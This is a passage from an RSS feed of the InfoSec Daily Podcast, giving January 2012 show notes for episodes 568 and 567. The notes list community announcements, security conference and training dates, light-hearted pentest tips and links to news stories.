<p>	<span>Guests: spridel, aricon, hackett, gozes, and connection.</span></p>
<p>	</b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Announcements:</span></b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Unsung Heros</span></b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Have you ever stumbled on a tool and wondered &ldquo;Why didn&rsquo;t I know this existed!&rdquo; or &ldquo;If only I&rsquo;d had this last week on that test&rdquo;&hellip; Chris John Riley has started to gather suggestions for your &ldquo;unsung hero&rdquo; of the tools world. &nbsp;He is looking specifically to gather a list of tools that aren&rsquo;t on every penetration testers, or forensic investigators list, but that you have respect for. &nbsp;</span><a href="http://blog.c22.cc/2012/01/13/unsung-heros"><span>http://blog.c22.cc/2012/01/13/unsung-heros</span></a></b></p>
<p>	<b><br />
	<span>Information Security Blogger Awards 2012</span><br />
	<span>Since we were over looked again for the Best Podcast on Security </span><span>you can email </span><span>ashimmy@hotmail.com</span><span> with your name, email address and ISD Podcast as your write-in nominee. &nbsp;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &nbsp;Vote for your favorite blogs as well on</span><a href="http://www.ashimmy.com/"><span> </span><span>www.ashimmy.com</span></a><span>.</span></p>
<p>	<span>Brad Smith (theNurse)</span><br />
	<span>We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span></p>
<p>	<span>Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span>http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span>http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size: 15px;font-family: Arial;background-color: transparent;text-decoration: none;vertical-align: baseline">Anti PIPA/SOPA Meetup</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;text-decoration: none;vertical-align: baseline">Meetup Groups across the country are mobilizing to help stop</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;text-decoration: none;vertical-align: baseline">SOPA and PIPA, as we will very potentially see PIPA&#039;s passage</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;text-decoration: none;vertical-align: baseline">in the next two weeks if we don&#039;t act.</span></p>
<p>	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;text-decoration: none;vertical-align: baseline">We at Meetup HQ are alerting members of the New York Tech</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;text-decoration: none;vertical-align: baseline">community about a chance to organize together. The NY Tech</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;text-decoration: none;vertical-align: baseline">Meetup, New York&#039;s largest Tech Meetup, has scheduled an</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;text-decoration: none;vertical-align: baseline">emergency Meetup on Wednesday, January 18. In order to build</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;text-decoration: none;vertical-align: baseline">critical mass and maintain an organized event *please RSVP in</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;text-decoration: none;vertical-align: baseline">the NY Tech Meetup* if you want to participate.</span></p>
<p>	<span>Go here to RSVP:</span><a href="http://www.meetup.com/ny-tech/events/47879702/"><span> </span><span>http://www.meetup.com/ny-tech/events/47879702/</span></a></p>
<p>	<span>CampusCon 2012</span><br />
	<span>When: January 21, 2012</span><br />
	<span>Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland</span><br />
	<a href="http://campuscon.hackingwit.com/"><span>http://campuscon.hackingwit.com</span></a><br />
	<span>(from Baconzombie)</span></p>
<p>	<span>New England InfoSec Tweetup</span><br />
	<span>When: January 21, 2012</span><br />
	<span>Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH</span><br />
	<a href="http://neistu3.eventbrite.com/"><span>http://neistu3.eventbrite.com/</span></a></p>
<p>	<span>SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span>When: Starts January 24, 2012</span><br />
	<span>Where: Atlanta, GA</span><br />
	<span>Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span>http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span>ShmooCon 2012</span><br />
	<span>When: January 27th-29th, 2012</span><br />
	<span>Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span>http://www.shmoocon.org</span></a></p>
<p>	<span>Schmoocon Epilogue</span><br />
	<span>When: After Schmoocon</span><br />
	<span>Where: Washington, DC</span><br />
	<span>Hit up anyone in NOVA Hackers</span></p>
<p>	<span>Metasploit Framework Unleashed Cincinnati</span><br />
	<span>When: February 11, 2012.</span><br />
	<span>Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
	<a href="https://msfucincy.wordpress.com/"><span>https://msfucincy.wordpress.com/</span></a><br />
	<span>$20 donation for #HFC</span></p>
<p>	<span>Social Engineering Training</span><br />
	<span>When: March 5-9, 2012<br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span>When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span>When: August 20-24, 2012</span><br />
	<span>Where: &nbsp;Bristol, UK</span><br />
	<span>When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD</span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span>http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span>BSides Chicago<br class="kix-line-break" /><br />
	</span><span>When: Saturday, April 28th, 2012<br class="kix-line-break" /><br />
	Where: Volcano Room (further info coming)</span><br />
	<span>Cost: Free (as always!) &#8211; Registration opening soon!</span><br />
	<a href="http://www.securitybsides.com/w/page/48444703/BSidesChicago-2012"><span>http://www.securitybsides.com/w/page/48444703/BSidesChicago-2012</span></a><br />
	<span>They&rsquo;re looking for sponsors, so if you know someone, pass it on.</span></p>
<p>	<span>Linuxfest Northwest 2012</span><br />
	<span>When: Saturday, April 28th-29th, 2012</span><br />
	<span>Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span>http://www.linuxfestnorthwest.org/</span></a><br />
	<span>CFP now open!</span></p>
<p>	<span>AIDE 2012</span><br />
	<span>When: May 21-25, 2012</span><br />
	<span>Where: MU Forensic Science Center</span><br />
	<span>Huntington, West Virginia</span><br />
	<a href="http://aide.marshall.edu/"><span>http://aide.marshall.edu</span></a><br />
	<span>CFP now open!</span></p>
<p>	<span>LayerOne 2012</span><br />
	<span>When: May 26-27, 2012</span><br />
	<span>Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span>http://www.layerone.org</span></a><br />
	<span>CFP now open!</span></p>
<p>	<span>Defcon 20</span><br />
	<span>When: July 26-29, 2012</span><br />
	<span>Where: Rio Hotel and Casino</span><br />
	<a href="http://defcon.org/"><span>defcon.org</span></a></p>
<p>	<span>DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span>When: &nbsp;September 27-30, 2012</span><br />
	<span>Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span>http://www.derbycon.com</span></a></p>
<p>	<span>Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="http://www.isdpodcast.com/"><span> </span><span>http://www.isdpodcast.com</span></a><span> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	</b></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Stories</span></b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Source: </span><a href="http://hacktalk.net/"><span>http://hacktalk.net/</span></a></b></p>
<p>	<b><br />
	<span>Pentest Lessons:</span><br />
	<span>Adam Compton &amp; Zac Wagle&#039;s should get credit for the &quot;Pentest Lessons&quot; idea. They also started a twitter account:</span><a href="https://twitter.com/pentestlessons"><span>https://twitter.com/pentestlessons</span></a><span>.</span><br />
	<span>Lesson 1:</span><span> Keep your employees SO busy that they don&rsquo;t have time to get pwnd.</span><br />
	<span>Lesson 2: </span><span>Make sure you&#039;re going to get paid, before you submit your invoice.</span><br />
	<span>Lesson 3: </span><span>Don&rsquo;t sign shit!</span><br />
	<span>Lesson 4: </span><span>Pre-meeting doxing, and social engineer to be what your client needs you to be&rdquo;</span><br />
	<span>Lesson 5:</span><span> Following don&rsquo;t sign shit, remember who is paying the bill. But that does not mean you need to be a complete passive tool while dealing with the customer. Be professional and to the point. Don&rsquo;t ramble.</span><br />
	<span>Lesson 6</span><span>: If you do not know how to answer a question, don&#039;t make shit up.</span></p>
<p>	<span>Source:</span><span> </span><a href="http://www.wired.com/threatlevel/2012/01/dns-sopa-provision/"><span>http://www.wired.com/threatlevel/2012/01/dns-sopa-provision/</span></a></p>
<p>	<span>Source: </span><a href="http://www.infosecisland.com/blogview/18892-Ten-Steps-to-Protect-Your-Organizations-Data.html"><span>http://www.infosecisland.com/blogview/18892-Ten-Steps-to-Protect-Your-Organizations-Data.html</span></a></p>
<p>	<span>Source: </span><a href="http://www.pcmag.com/article2/0,2817,2398926,00.asp"><span>http://www.pcmag.com/article2/0,2817,2398926,00.asp</span></a></p>
<p>	<span>Source: </span><a href="http://usestealth.com/"><span>http://usestealth.com/</span></a></p>
<p>	<span>Source: </span><a href="http://thehackernews.com/2012/01/one-click-fraud-targeting-japan.html"><span>http://thehackernews.com/2012/01/one-click-fraud-targeting-japan.html</span></a></p>
<p>	<span>Source: </span><a href="http://thehackernews.com/2012/01/security-enhanced-se-android-released.html"><span>http://thehackernews.com/2012/01/security-enhanced-se-android-released.html</span></a></p>
<p>	<span>Source: </span><a href="http://blogs.computerworlduk.com/open-enterprise/2012/01/is-microsoft-blocking-linux-booting-on-arm-based-hardware/index.htm"><span>http://blogs.computerworlduk.com/open-enterprise/2012/01/is-microsoft-blocking-linux-booting-on-arm-based-hardware/index.htm</span></a></b></div>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-568-weekend-wrap-up-with-dr-b0n3z/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3380/0/infosec-daily-podcast-episode-568.mp3" length="25620669" type="audio/mpeg" />
		<itunes:duration>0:53:23</itunes:duration>
		<itunes:subtitle>&#160;
Episode 568 &#8211; Weekend Wrap-up with Dr. b0n3z
	InfoSec Daily Podcast Episode 568 for January 14, 2012. &#160;Tonight&#039;s podcast is hosted by Dr. Bonez, Boris Sverdlik, and Themson Mester.
	Guests: spridel, aricon, hackett, gozes, and[...]</itunes:subtitle>
		<itunes:summary>&#160;
Episode 568 &#8211; Weekend Wrap-up with Dr. b0n3z
	InfoSec Daily Podcast Episode 568 for January 14, 2012. &#160;Tonight&#039;s podcast is hosted by Dr. Bonez, Boris Sverdlik, and Themson Mester.
	Guests: spridel, aricon, hackett, gozes, and connection.
	
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John Riley has started to gather suggestions for your &#8220;unsung hero&#8221; of the tools world. &#160;He is looking specifically to gather a list of tools that aren&#8217;t on every penetration testers, or forensic investigators list, but that you have respect for. &#160;http://blog.c22.cc/2012/01/13/unsung-heros
	
	Information Security Blogger Awards 2012
	Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. &#160;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &#160;Vote for your favorite blogs as well on www.ashimmy.com.
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	Anti PIPA/SOPA Meetup
	Meetup Groups across the country are mobilizing to help stop
	SOPA and PIPA, as we will very potentially see PIPA&#039;s passage
	in the next two weeks if we don&#039;t act.
	We at Meetup HQ are alerting members of the New York Tech
	community about a chance to organize together. The NY Tech
	Meetup, New York&#039;s largest Tech Meetup, has scheduled an
	emergency Meetup on Wednesday, January 18. In order to build
	critical mass and maintain an organized event *please RSVP in
	the NY Tech Meetup* if you want to participate.
	Go here to RSVP: http://www.meetup.com/ny-tech/events/47879702/
	CampusCon 2012
	When: January 21, 2012
	Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland
	http://campuscon.hackingwit.com
	(from Baconzombie)
	New England InfoSec Tweetup
	When: January 21, 2012
	Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH
	http://neistu3.eventbrite.com/
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Schmoocon Epilogue
	When: After Schmoocon
	Where: Washington, DC
	Hit up anyone in NOVA Hackers
	Metasploit Framework Unleashed Cincinnati
	When: February 11, 2012.
	Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
	https://msfucincy.wordpress.com/
	$20 donation for #HFC
	Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD
	http://www.social-engineer.com/social-engineer-training
	BSides Chicago
	When: Saturday, April 28th, 2012
	Where: Volcano Room (further info coming)
	Cost: Free (as always!) &#8211; Registration opening soon!
	http://www.securitybsides.com/w/page/48444703/BSidesChicago-2012
	They&#8217;re looking for sponsors, so if you know someone, pass it on.
	Linuxfest Northwest 2012[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 567 &#8211; Friday 13th, Facebook Security Scam, Cyber Insurance, Sykipot, When Your Google Skills Fail &amp; SOPA Soundoff</title>
		<link>http://www.isdpodcast.com/episode-567-friday-13th-facebook-security-scam-cyber-insurance-sykipot-when-your-google-skills-fail-sopa-soundoff</link>
		<comments>http://www.isdpodcast.com/episode-567-friday-13th-facebook-security-scam-cyber-insurance-sykipot-when-your-google-skills-fail-sopa-soundoff#comments</comments>
		<pubDate>Sat, 14 Jan 2012 01:57:43 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3368</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 567 for January 13, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Geordy Rostad, and Dr. Bonez. &#160; Announcements: Unsung Heros Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 567 for January 13, 2012. &nbsp;</span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Geordy Rostad, and Dr. Bonez.</span><br />
	&nbsp;</p>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Unsung Heros</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Have you ever stumbled on a tool and wondered &ldquo;Why didn&rsquo;t I know this existed!&rdquo; or &ldquo;If only I&rsquo;d had this last week on that test&rdquo;&hellip; Chris John Riley has started to gather suggestions for your &ldquo;unsung hero&rdquo; of the tools world. &nbsp;He is looking specifically to gather a list of tools that aren&rsquo;t on every penetration testers, or forensic investigators list, but that you have respect for. &nbsp;</span><a href="http://blog.c22.cc/2012/01/13/unsung-heros"><span style="font-size:15px;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.c22.cc/2012/01/13/unsung-heros</span></a></div>
<p>
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Information Security Blogger Awards 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since we were over looked again for the Best Podcast on Security </span><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">you can email </span><a href="mailto:ashimmy@hotmail.com"><span style="font-size:15px;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">ashimmy@hotmail.com</span></a><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> with your name, email address and ISD Podcast as your write-in nominee. &nbsp;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &nbsp;Vote for your favorite blogs as well on </span><a href="http://www.ashimmy.com/"><span style="font-size:15px;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">www.ashimmy.com</span></a><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;color:#222222;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anti PIPA/SOPA Meetup</span><br />
	<span style="font-size:15px;color:#222222;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Meetup Groups across the country are mobilizing to help stop</span><br />
	<span style="font-size:15px;color:#222222;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SOPA and PIPA, as we will very potentially see PIPA&#39;s passage</span><br />
	<span style="font-size:15px;color:#222222;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">in the next two weeks if we don&#39;t act.</span></p>
<p>	<span style="font-size:15px;color:#222222;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We at Meetup HQ are alerting members of the New York Tech</span><br />
	<span style="font-size:15px;color:#222222;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">community about a chance to organize together. The NY Tech</span><br />
	<span style="font-size:15px;color:#222222;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Meetup, New York&#39;s largest Tech Meetup, has scheduled an</span><br />
	<span style="font-size:15px;color:#222222;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">emergency Meetup on Wednesday, January 18. In order to build</span><br />
	<span style="font-size:15px;color:#222222;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">critical mass and maintain an organized event *please RSVP in</span><br />
	<span style="font-size:15px;color:#222222;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">the NY Tech Meetup* if you want to participate.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Go here to RSVP: </span><a href="http://www.meetup.com/ny-tech/events/47879702/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.meetup.com/ny-tech/events/47879702/</span></a></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CampusCon 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland</span><br />
	<a href="http://campuscon.hackingwit.com/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://campuscon.hackingwit.com</span></a><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(from Baconzombie)</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">New England InfoSec Tweetup</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH</span><br />
	<a href="http://neistu3.eventbrite.com/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://neistu3.eventbrite.com/</span></a></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Schmoocon Epilogue</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: After Schmoocon</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington, DC</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hit up anyone in NOVA Hackers</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Metasploit Framework Unleashed Cincinnati</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: February 11, 2012. </span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
	<a href="https://msfucincy.wordpress.com/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://msfucincy.wordpress.com/</span></a><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">$20 donation for #HFC</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br />
	Where: Black Hat Vegas</span><br />
